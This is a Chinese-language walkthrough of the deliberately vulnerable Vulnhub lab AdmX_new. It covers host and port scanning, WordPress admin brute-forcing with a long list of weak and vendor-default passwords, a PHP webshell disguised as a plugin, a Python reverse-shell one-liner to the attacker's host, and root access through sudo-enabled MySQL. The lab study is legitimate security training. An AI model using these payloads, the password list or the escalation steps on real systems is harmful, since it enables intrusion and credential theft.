打靶记录4——靶机AdmX_new

靶机下载

百度网盘

通过百度网盘分享的文件：4.AdmX_new.7z
链接：https://pan.baidu.com/s/1EBNU6Uas93v1xXMH6SiBDg?pwd=yoxr 
提取码：yoxr 

或者Vlunhub上面

https://download.vulnhub.com/admx/AdmX_new.7z

靶机无法获取到IP参考博客

1. Vulnhub靶机无法获取IP地址的解决思路 - Jason_huawen - 博客园 (cnblogs.com)
2. 靶机无法获得IP地址，该怎么办？
3. 靶机: AdmX_new - sha0dow - 博客园 (cnblogs.com)

靶机和Kali都设置成了桥接模式了，然后单用户模式修改网络配置

涉及的攻击方法

• 主机发现
• 端口扫描
• Web路径爆破
• BurpSuite自动替换
• 密码爆破
• MSF漏洞利用
• Wordpress漏洞利用
• NC反弹Shell升级成可以按Tab键自动补全的Shell
• 蚁剑上线
• 利用Mysql提权

目标

• 获取两个flag
• 获取root权限

笔记

• 企业在实际的生产环境中会进行密码的复用，比如操作系统和数据库用同一个密码
• 渗透测试还是要靠充分的信息收集才能最终成功的

主机发现

nmap -sn 192.168.0.0/24

0.100的IP是我的桥接网卡的IP，0.120是Kali的IP，那么靶机的IP就是0.101了

端口扫描和服务发现

nmap -sV 192.168.0.101

发现开着80端口，那么直接访问Web界面，发现只有一个Apache界面

路径爆破

工具可以用的有好多：

• dirsearch
• dirb
• feroxbuster

dirsearch -u "http://192.168.0.101/" 

那么继续对 /Wordpress/路径下进行扫描

dirsearch -u "http://192.168.0.101/wordpress/" 

访问/Wordpress/路径发现加载时间过长

查看源代码和BurpSuite发现，通过硬编码的方式写死了一些IP地址


于是通过BurpSuite的匹配和替换，也就是Match And Replace这样的一个功能，将写死的IP地址替换成目标靶机的IP地址，从而可以比较流畅的打开Web页面

先把原来的东西都Remove，然后点Add添加替换规则，把响应头和响应包中凡是带有192.168.159.145的都改成靶机IP——192.168.0.101


然后我们再去刷新访问一下页面就正常了

前面扫描又发现疑似登录后台的地址

如果随便输个账号会提示不认识该账号，但是输入admin账号会提示密码错误，说明存在admin账户

密码爆破

利用网上搜集而来的高质量弱密码字典再结合BurpSuite来爆破密码

123456
112233
password
123456789
12345678910
123123
666666
111111
0
12345
456789
456123
741963
admin
adam14
test
admin888
admin123
admin112233
888888
999999
141414
test123
222222
321123
123321
11111111
66666666
88888888
asd123456
asd123456789
asd12345678
qaz123123
qwerty
1234
1234567890
a123456
a123456.
123456a
123456a.
123456abc
123456abc.
azwsx
qazwsx.
1qaz2wsx
1qaz2wsx.
1q2w3e4r
1q2w3e4r.
1q2w3e4r5t
1q2w3e4r5t.
1q2w3e
1q2w3e.
qwertyuiop
qwertyuiop.
zxcvbnm
zxcvbnm.
qwe123
123qwe
a123123
123456aa
woaini
q123456
123456789a
asd123
a123456789
z123456
a5201314
aa123456
zhang123
aptx4869
123123a
1qazxsw2
5201314a
aini1314
q1w2e3r4
123456qq
1234qwer
a111111
iloveyou
abc123
111111a
w123456
123qweasd
qwer1234
a000000
aaa123
q1w2e3
aaaaaa
a123321
12qwaszx
s123456
12345678
1234567
Aa123456.
password123
Password1234
admin@123
admin@123456
P@ssw0rd
Passw0rd
password1
Aa1234
Aa12345
Aa1234567
Aa12345678
q1w2e3r4t5y6
Aa123456@
1qaz!QAZ
qwer@1234
Aa868686
Aa123123
Passw0rd#123
pass#123
Aa@1234!
Aa123321
Bb123123
1qaz#EDC
123
Abc123!
Abc123!@#
abc1234!
@bcd1234
#EDC4rfv
abcABC123
1qaz!@#$
admin@1234
QAZwsx123
Pa$$w0rd
P@$$word
P@$$word123
Abcd1234
!QAZ2wsx
!QAZ3edc
2wsx#EDC
1!qaz2@wsx
1234abcd
1qaz@WSX
1qaz@WSX#EDC
!q2w3e4r
QWER!@#$
Passwd@123
Passwd12
Passwd@123456
123456qwerty!@#$%^
qweasdzxc
administrator
administrator123
sa123
ftp
ftppass
sa
adminpass
qazwsx
123qaz
p@ssword
pass
passwd
qwer123
123abc
root
a
system
1
guest
66666
!qaz@wsxarlpass
private
zxsoft1234!@#$
hicomadmin
eyou_admin
admin@eyou
cyouadmin
#NAME?
cnoa.cn2010password
leadsec@7766
leadsec
leadsec32
leadsec.useradmin
leadsec.auditor
leadsec.waf
admin*PWD
firewall
talent
ns25000
cyberaudit
telent
guest*PWD
venus.fw
venus.audit
venus.user
SL
user
safetybase
grouter
adsl1234
sxzros
120223
dlanrecover
sangfor
sangfor@2018
sangfor@2019
edr@sangfor
hillstone
qxcomm1680
qxcommsupport
qxcomm1688
qxcommsuport
sua_password$123
sa_password$123
password$123
venus70
venus60
sys$admin@028
freesvr
csmp@CLOUD987
!1fw@2soc#3v-p-n
!1fw@2soc#3vpn
useradmin
sysmanager888
adminadmin
mq123456
nsfocus123
nsf0cus
weboper
webaudit
conadmin
shell
default
Tiaolc@lv7000
26012345
colasoft
o2
super123
Changeme@321
Admin@storage
Changeme_123
Huawei12#$
Admin@9000
Changeme123
O&m15213
admin@huawei.com
eSight@123
HuaWei123
Admin@huawei
Ftp12345
Derby123
defaultCertPwd@12
sek123
Huawei13#$
Wo#a*Vk%._88
infoseclab
9300
huawei
Bigdata123@
Huawei@123
Cis#BigData123
WWW@HUAWEI
telnetpwd
ftppwd
nesoft
userEp
adminHW
*****
Changeme_123。
mduadmin
Admin_123
conexant
nE7jA%5m
dare
epicrouter
tplus_12345
bravo_2008
SZIM
manager
nacos
PrOw!aN_fXp
@dsl_xilno
atc456
ZXDSL
on
Zte521
W!n0&oO7.
expert03
zoomadsl
zeosx
3098z
Zenith
alphaadmin
alphacom
1851
zabbix
19750407
727
!admin
access
switch
1502
super
1111
x-admin
11111
Fiery.1
nsa
2222
22222
crash
xd
wampp
Fireport
winterm
r@p8p0r+
wyse
WebBoard
pwAdmin
pwPower
pwUser
pwddbo
wwUser
wwPower
wwAdmin
wwdbo
sinogrid
rootpass
IS_
FELDTECH
SecurityMaster08
trinity
Wyse#123
sonos
m9ff.QW
wasadmin
maxadmin
mxintadm
maxreg
instrument
Passw0rd!
openhabian
vagrant
Password123!
Compleri
SESAME
sysAdmin
Cardio.Perfect
detmond
trancell
hp.com
weblogic1
WEBLOGIC
PUBLIC
EXAMPLES
welcome
letmein
wdlinux.cn
wg
readwrite
readonly
pepino
ABCD
NTCIP
waav
vpasp
pw
merlin
FELDTECH_VNC
vnc_pcc
elux
Passwort
visam
Amx1234!
1988
Vision2
TOUCHLON
EltakoFVS
muster
passwd11
qwasyx21
ripnas
eyevis
fidel123
Admin#1
sigmatek
hapero
raspberry
solarfocus
AVStumpfl
maryland-dstar
pass1
pass2
beijer
vnc
yesco
protech
MAINT
OPERATIONS
OPERATNS
VTAM
visual
QNX
supervisor
V4in$ight
Vextrex
vertex25
166816
dbase
field
*3noguru
snmp
utstar
operator
overseer
adm
anon
bbs
sys
checkfs
checkfsys
checksys
daemon
demo
demos
dni
fal
fax
games
gopher
guestgue
halt
informix
install
bin
lineprin
lp
lpadm
lpadmin
lynx
mail
man
me
mountfs
mountfsys
mountsys
news
nobody
postmast
powerdown
rje
hp
smile
setup
shutdown
sync
sysadm
sysbin
system_admin
trouble
umountfs
umountfsys
umountsys
unix
uucp
uucpadm
web
webmaster
www
HTTP
NAU
ubnt
Unidesk1
amber
support
joh316
enter
admin321
SECRET123
managers
extendnet
TrippLite
Trintech
imss7.0
imsa7.0
trendimsa1.0
24Banc81
Toshiba
toshy99
superpass
topadmin
toplayer
thanos123.com
cli123.com
twns
tomcat
role1
changethis
j5Brn9
BIGO
tiny
Dr8gedog
changeit
tiara
tiaranet
james
telus00
telus99
tetra
xc3511
vizxv
xmhdipc
juantech
54321
None
admin1234
smcadmin
klv123
service
klv1234
hi3518
jvbzd
anko
zlxx.
7ujMko0vizxv
7ujMko0admin
ikwb
dreambox
realtek
1111111
meinsm
tech
fucker
admin_1
tellabs#1
vantage12!
eagle
nopasswd
telco
tegile
xbox
12871
Tasmannet
master
GWrv
TANDBERG
10023
secret
truetime
mercury
superuser
Symbol
symantec
brightmail
SQL
sasasa
mysweex
blank
rdc123
surecom
ksdjfg934t
AlpheusDigital1010
changeme
sun123
t00lk1t
ssp
100198
ahetzip8
stratauser
nasadmin
ascend
2501
SSA
splendidcrm2005
hello
speedxess
adminttd
shs
Protector
sobey
#l@$ak#.lk;0@P
whd
manage
0392a0
2read
4changes
agent
agent_steal
all
ANYCOM
apc
bintec
blue
c
C0de
cable
canon_admin
cc
cisco
community
core
CR52401
debug
dilbert
enable
freekevin
fubar
hp_admin
ibm
ilmi
intermec
internal
l2
l3
mngt
monitor
netman
network
NoGaH$@!
openview
OrigEquipMfr
pr1v4t3
proxy
publ1c
read
red
regional
rmon
rmon_admin
ro
router
rw
rwa
s!a@m#n$p%c
sanfran
san
scotty
security
seri
snmpd
snmptrap
SNMP_trap
solaris
sun
test2
tiv0li
tivoli
trap
world
write
xyzzy
yellow
Barricade
highspeed
WLAN_AP
w0rkplac3rul3s
sma
skf_admin1
b
d
l
m
damin
sitecom
4Dgifts
tour
tutor
ganteng
18140815
31994
SKY_FOX
uboot
2WSXcde
2WSXcder
pwp
engineer
op
poll
gubed
hagpolm1
basisk
Spacve
admin1
Sharp
admn
gen1
gen2
rainbow
friend
changeonfirstlogin
w2402
ntpupdate
SECAdmin1
19920706
isdev
iscopy
6071992
7061992
SAP
axis2
sap123
init
4321
Any
Menara
DBA!sa@EMSDB123
d1scovery
p1nacate
col1ma
RSAAppliance
themaster01
Rodopi
eomjbOBLLwbZeiKV
RM
rmnetlm
replicator
resumix
Col2ogro2
toor
AR#Admin#
11223344
piranha
q
AMIAMI
AMIDECOD
raritan
sl33p30F00dumass!
raidzone
radware
MCUrv
744
questra
TOAD
teX1
xljlbj
images
QDI
lesarotl
gnumpf
h179350
prtgadmin
Musi%1921
hawk201
dos
fam
guest1
mfd
netlink
prime
primeos
primenet
primos
tele
Gateway
pwrchute
postgres
456
ACCORD
x6zynd56
SpIp
*
#
SECONDARY
dbpass
svcPASS83
ISPMODE
[^_^]
default.password
microbusiness
mu
smallbusiness
DSL
phpreactor
pfsense
$secure$
pento
nician
panabit
ixcache
touchpwd=
bell9
56789
osmc
d.e.b.u.g
echo
webdb
WOOD
ADLDEMO
JETSPEED
SWORDFISH
AP
APPLSYS
FND
FNDPUB
APPS
APPUSER
AQ
AQDEMO
AQJAVA
AQUSER
AUDIOUSER
INVALID
BC4J
PAPER
BRIO_ADMIN
CATALOG
CDEMO82
CDEMOCOR
CDEMORID
CDEMOUCB
CENTRA
CIDS
CIS
CISINFO
CLOTH
COMPANY
COMPIERE
CSMIG
CTXDEMO
CTXSYS
MUMBLEFRATZ
DBSNMP
DEMO8
DEMO9
DES
DEV2000_DEMOS
DIP
DISCOVERER_ADMIN
DSGATEWAY
DSSYS
EJSADMIN
EMP
ESTORE
EVENT
EXFSYS
FINANCE
SNOWMAN
GL
GPFD
GPLD
HCPARK
HLW
HR
IMAGEUSER
IMEDIA
JMUSER
STEEL
AIROPLANE
L2LDEMO
LBACSYS
SHELVES
MDDEMO
CLERK
MGR
MDSYS
MFG
MGWUSER
MIGRATE
MILLER
MMO2
YES
MOREAU
MTSSYS
MTS_PASSWORD
MTYSYS
MXAGENT
NAMES
OAS_PUBLIC
OCITEST
ODM
MTRPW
ODS
ODSCOMMON
OE
OEMADM
OEMREP
OLAPDBA
INSTANCE
ORACLE
OO
OPENSPIRIT
ORAREGSYS
ORASSO
ORDPLUGINS
ORDSYS
OSP22
OUTLN
OWA
OWA_PUBLIC
OWNER
PANAMA
PATROL
PERFSTAT
PLEX
SUPERSECRET
PM
PO
PO7
PO8
PORTAL30
PORTAL31
PORTAL30_DEMO
PORTAL30_PUBLIC
PORTAL30_SSO
PORTAL30_SSO_PS
PORTAL30_SSO_PUBLIC
POWERCARTUSER
PRIMARY
PUBSUB
PUBSUB1
QDBA
QS
QS_ADM
QS_CB
QS_CBADM
QS_CS
QS_ES
QS_OS
QS_WS
RE
REPADMIN
OEM_TEMP
REP_OWNER
RMAIL
RMAN
SAMPLE
SAPR3
TIGER
SDOS_ICSAP
SECDEMO
SERVICECONSUMER1
SH
SITEMINDER
SLIDEPW
STARTER
STRAT_PASSWD
SWPRO
SWUSER
SYMPA
CHANGE_ON_INSTALL
D_SYSPW
D_SYSTPW
TAHITI
TDOS_ICSAP
TESTPILOT
TRACE
TRAVEL
TSDEV
TSUSER
TURBINE
ULTIMATE
USER0
USER1
USER2
USER3
USER4
USER5
USER6
USER7
USER8
USER9
UTLESTAT
VIDEO
VIF_DEV_PWD
VIRUSER
VRR1
WEBCAL01
WEBREAD
WKSYS
WWWUSER
XPRT
bpel
ilom-admin
ilom-operator
nm2user
tigger
siteadmin
wlcsystem
wlpisystem
mpegvideo
cacadmin
uplink
opengts
OCS
1423
0P3N
OneFish2021
SMDR
adslolitec
AaBbCcDd
OkiLAN
nsi
cr0wmt
911
fran
8
ARCHIVIST
BACKUP
CHEY_ARCHSVR
FAXUSER
FAXWORKS
GUESTGUEST
TSEUG
HPLASER
LASER
LASERWRITER
POST
PRINT
PRINTER
HARRIS
NETFRAME
NF
NFI
USER_TEMPLATE
WANGTEK
WINDOWS_PASSTHRU
SABRE
WINSABRE
novell
266344
l1
secure
admin000
PlsChgMe!
ccrusr
distrib0
4tas
disttech
etas
8429
ntacdmax
mlusr
3ep5w2u
visor
nortel
adminpwd
trmcnfg
user0000
23646
9999
Telecom
nokai
nokia
client
m1122
123454
rootme
xdfk9874t3
NetVCR
nicecti
asd
NeXT
signa
generated
netxms
e250changeme
e500changeme
NetCache
netscreen
noway
netopia
naadmin
zebra
Geardog
draadloos
infrant1
netgear1
5777364
21241036
netbotz
ncrm
ciwuxe
cic
cic!23456789
NetSeq
GlobalAdmin
muze
BPMS
sqlserver
mp3mystic
motorola
yZgO8Bvj
isee
D@rj33l1ng
blablabla
5X2000
sx2000
1000
mnet
minioadmin
bsxpass
IS_$hostname
LdapPassword_1
MSHOME
dn_04rjc
sldkj754
xyzall
SilkCentral12!34
phplist
msf
msfdev
RSX
star
medocheck123
medion
M3d!aP0rtal
redips
scmchangeme
webshieldchangeme
prost
sp99dd
mono
mMmM
cascade
UI-PSWD-01
UI-PSWD-02
AitbISP4eCiG
bciimpw
bcimpw
bcmspw
bcnaspw
bluepw
browsepw
looker
craft
craftpw
custpw
enquirypw
inads
indspw
initpw
locatepw
maintpw
rwmaint
nmspw
pwpw
rcustpw
lucenttech2
lucenttech1
supportpw
admpw
sysadmpw
syspw
logapp
changeme!
sspassword
uClinux
orion99
tivonpw
SENTINEL
Liebert
LR-ISDN
jannie
singh
leviton
MULTIMEDIA
AIMS
lantronix
dev
2800
admin00
kronites
MagiMFP
kodi
NetServer
sys123
KEYSCAN
adslroot
kali
3477
8111
jvc
juniper123
<<<
%s
=
%u
peribit
redline
serial#
%u.
57gbzb
technolgi
control
spooml
supermanito
PRODDTA
JDE
jasperadmin
joeuser
bitnami
0th
Janitza
jamfsw03
iwill
ironport
NetSurvibox
FOOBAR
X#1833
$chwarzepumpe
masterkey
Intel
isolation
shiva
NICONEX
kahn
timely
ip20
ip21
ip3000
ip305Beheer
ip400
$ei$micMicro
P@55w0rd!
iDirect
icatch99
ucdpadmin
admin0001
$SRV
22222222
MBIU0
sertafu
R1QTPS
CISSUS
CMSBATCH
DBDCCIC
FORSE
SYS1
OPER
BASE
PRODCICS
PROG
QSRV
SYSA
VCSRV
db2fenc1
db2inst1
qpgmr
qsecofr
qserv
qsrvbas
ibmcel
qsvr
qsysopr
quser
secofr
secacm
specialist
sysopr
USERP
webibm
wpsadmin
i2b2metadata
i2b2demodata
i2b2workdata
i2b2metadata2
i2b2demodata2
i2b2workdata2
i2b2hive
hqadmin
vodafone
HuaweiUser
admintelecom
digicel
opsware_admin
AUTORAID
advcomm500349
foolproof
LCS
pwd
3
TLS
honey
hipchat
hpt
hewlpack
HPOFFICE
DATA
HPONLY
HPP187
HPWORD
PUB
LOTUS
FIELD.SUPPORT
MANAGER.SYS
MGR.SYS
OP.OPERATOR
badg3r5
MPE
REMOTE
TELESUP
COGNOS
ITF3000
TCH
VESOFT
CAROLIAN
CCC
CNAS
CONV
HPDESK
HPP189
HPP196
INTX3
NETBASE
REGO
ROBELLE
WORD
XLSERVER
DISC
mysecretpassword0*
isp
Harbor12345
ucenik
adminer3260
adminer3200
adminer3100
adminer
h3capadmin
h3c
guardone
4tugboat
broadband
nimdaten
author
urchin
glftpd
5iveL!fe
gnos
Muse!Admin
console
gandalf
xmux
Sysop
radius
connect
!manage
Posterie
bcpb+serial#
bcpb
pbcpbn
firstsite
xceladmin
fw
publish
EyesOfNetwork
exinda
admin256
user5710
Exabyte
jstwo
help
expert
MuZhlo9n%8!G
central
store
repair
netadmin
tiger123
xo11nE
enhydra
epp2011
42Emerson42Eme
Emerson1
MCUser1
backuponly1
backuprestore1
restoreonly1
8RttoTriz
viewuser1
4133
builtin
Ektron
hs7mwxkk
4getme2
su@psir
software01
ilon
$easyWinArt4
easygbs
userNotU
dvst10n
pixmet2003
par0t
dnnadmin
dnnhost
wrgg15_di524
D-Link
gvt12345
year2000
syslib
maintain
komprie
ALLIN1
ALLIN1MAIL
ALLINONE
BATCH
DCL
DECMAIL
DECNET
NONPRIV
DIGITAL
HELPDESK
HOST
INFO
INGRES
LINK
MAILER
MBMANAGER
MBWATCH
NETCON
NETMGR
NETNONPRIV
NETPRIV
NEWINGRES
OPERVAX
PDP11
PDP8
POSTMASTER
PRIV
REPORT
STUDENT
SYSMAINT
UETP
SYSTEST
SYSTEST_CLIG
TELEDEMO
VAX
VMS
accounting
boss
software
BRIDGE
michelangelo
PBX
my_DEMARC
calvin
Dell
nz0u4bbe
1RRWTTOOI
storageserver
MServer
tatercounter2000
db2pass
db2pw
db2password
dasusr1
db2admin
Daytec
davox
any@
ioFTPD
tini
Daewuu
tslinux
surt
Congress
cgadmin
CTX_123
Crystal
ergc
x40rocks
coremail
corecess
ducati900ss
t0talc0ntr0l4!
29111991
amigosw1
last
asecret
Compaq
240653C9467E45
mydlp
dmr99
CantTouchThis
eTIPS123
RAV
converge
familymacintosh
nsroot
rootadmin
citel
riverhead
cmaker
attack
_Cisco
cable-docsis
otbu+1
7936
diamond
tsunami
changeme2
hsadb
pnadmin
perfectpraise
blender
secur4u
wlsedb
wlsepassword
iolan
protection
tooridu
cellit
mediator
Mua'dib
PracticeUser1
DV5800
7654321
camera
pamadmin
nq
brocade1
Fact4EMC
Serv4EMC
fibranne
fivranne
broadmax
installer
webadmin
laflaf
RPSsql12345
live
correct
BackupU$r
articon
22332323
nimda
ImageFolio
Biostar
Q54arwms
Babylon
biodata
snmp-Trap
funkwerk
bewan
MiniAP
Musii%1921
NetICs
ssladmin
clickshare
azkaban
1322222
256256
589589
589721
?award
AWARD
SW
AWARD?SW
AWARD_PW
AWARD_SW
BIOS
CONCAT
HELGA-S
HEWITT
RAND
HLT
SER
SWITCHES_SW
SW_AWARD
SZYX
Sxyz
TTPTHA
TzqF
ZAAADA
aLLy
aPAf
alfarome
award.sw
award_?
award_ps
awkward
biosstar
condo
djonet
efmukl
g6PJ
h6BB
j09F
j256
j262
j322
j64
lkw
peter
lkwpeter
t0ch20x
t0ch88
wodj
zbaaaca
zjaaadc
SY_MB
Administrative
Craftr4
ggdaseuaimhrke
crftpw
barney
dadmin
dadmin01
danger
xxyyzz
ROOT500
cms500
autocad
telos
atlantis
5678
5SaP9I26
mcp
SnuFG5
TJM
3ascotel
Asante
234
*ARIS!1dm9n#
atc123
scout
alpine
dottie
TENmanUFactOryPOWER
backdoor
device
OvW*busr1
j2deployer
kdsxc
xampp
s3cret
QLogic66
apachepulsar
KYLIN
guacadmin
jboss4
antsle
acc
mozart
Polrty
leaves
snake
A.M.I
AM
AMI
AMI!SW
AMI.KEY
AMI.KEZ
AMI?SW
AMIPSWD
AMISETUP
AMI_SW
AMI~
BIOSPASS
CMOSPWD
aammii
linga
allot
bagabu
secoff
alien
1064
ANS#150
adfexc
at4400
dhs3mt
dhs3pms
kilo1987
pbxk1064
tuxalize
help1954
tlah
llatsni
kermit
mtch
mtcl
letacla
permit
kn1TG7psLu
Airaya
Advance
adtran
ax400
2580
anonymous
aparker
jdoe
replication-receiver
vgnadmin
adaptec
acer
anicust
3ware
volition
RIP000
1234admin
comcomcom
synnet
recover
recovery
!root
factory
dragon
baseball
football
monkey
shadow
mustang
michael
654321
superman
7777777
121212
killer
trustno1
jordan
jennifer
asdfgh
hunter
buster
soccer
harley
batman
andrew
sunshine
2000
charlie
robert
thomas
hockey
ranger
daniel
starwars
klaster
george
computer
michelle
jessica
pepper
zxcvbn
555555
131313
freedom
777777
maggie
159753
ginger
princess
joshua
cheese
amanda
summer
love
ashley
nicole
chelsea
biteme
matthew
yankees
987654321
dallas
austin
thunder
taylor
matrix
mobilemail
mom
monitoring
montana
moon
moscow
pass123
pass@123
654321
123
admin123!@#
P@ssw0rd!
123qwe
123qwe!@#
666666
123456~a
123456!a
1234567890
8888888
abc123456
a11111
a12345
Aa1234.
Aa12345.
2wsx@WSX
qwe123!@#
Aa123456!
A123456s!
sa123456
1q2w3e
Charge123
Aa123456789

爆破得到密码adam14，成功进入后台

上传Webshell

通过插件的方式上传Webshell
编写插件，代码中的注释是必须的，是插件的格式，如果没有是无法正常上传的

<?php
/*
Plugin Name: WebShell
Plugin URI: https://blog.csdn.net/weixin_64422989?type=blog
Description: DedSecc
Author: DedSec
Version: 1.0
Author URI: https://blog.csdn.net/weixin_64422989?type=blog
*/
 
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>

还得先通过zip命令来把它变成压缩包才能上传

zip shell.zip shell.php

接下来就可以手动的把它传到目标服务器上了，是在这里这个位置上传


点击一下Activate按钮去激活插件

发现成功激活之后

它的默认的URL路径是/wordpress/wp-content/plugins/shell.php
然后带上参数cmd执行id命令，发现能执行成功

反弹shell

利用Python来进行反弹Shell
先看一下有没有Python3 which python3

python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.120",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

nc 监听之后浏览器执行代码，成功弹回一个shell

信息收集

看一下内核

然后看Wordpress的配置文件，就是wp-config.php，发现了数据库的密码Wp_Admin#123

然后再home目录下发现一个账户wpadmin，与一个疑似flag文件，但是只有wpadmin这个账户有权限查看

猜测密码可能与后台登录密码一致，为adam14，成功获取第一个flag

sudo -l 发现该用户可以不需要密码以root权限直接执行mysql，从而得到一个root的mysql

sudo /usr/bin/mysql -u root -D wordpress -p

Mysql中可以使用 system 来执行系统命令，system也可以写出 !

成功获取root权限和最后一个flag

总结

1. 先对该靶机进行了主机发现和端口扫描，只发现了一个80端口，这是我们唯一的攻击方式
2. 浏览器访问发现只有一个Apache的页面，于是我们对目标的Web服务进行路径的爆破，发现了WordPress
3. 但是发现加载速度很慢，于是使用BurpSuite进行抓取和分析整个Web请求的所有流量，发现是在页面上通过硬编码的方式写死了一些IP地址，于是通过BurpSuite的匹配和替换，也就是Match And Replace这样的一个功能，将写死的IP地址替换成目标靶机的IP地址，从而可以比较流畅的打开Web页面
4. 于是访问到Wordpress的后台登录页面，通过密码爆破获得admin管理员的账号和密码
5. 在后台总结和利用了Wordpress常见的后台利用方法，有三种

• 通过媒体上传的方式上传Webshell
• 通过主题样式进行修改或者上传Webshell
• 通过插件的方式上传Webshell，最终成功！

6. 用手工和MSF的方式反弹Shell，发现手工的效果更好！
7. 基于已经获得的反弹Shell，然后进行更新升级，然后利用交互的Shell，对目标系统上的404.php文件编辑，利用它来进行蚁剑的上线
8. 最后是提权，利用Mysql数据自身具备的 system命令来进行了提权，前提是由于目标靶机的sudo 权限配置不当，而给我们的可乘之机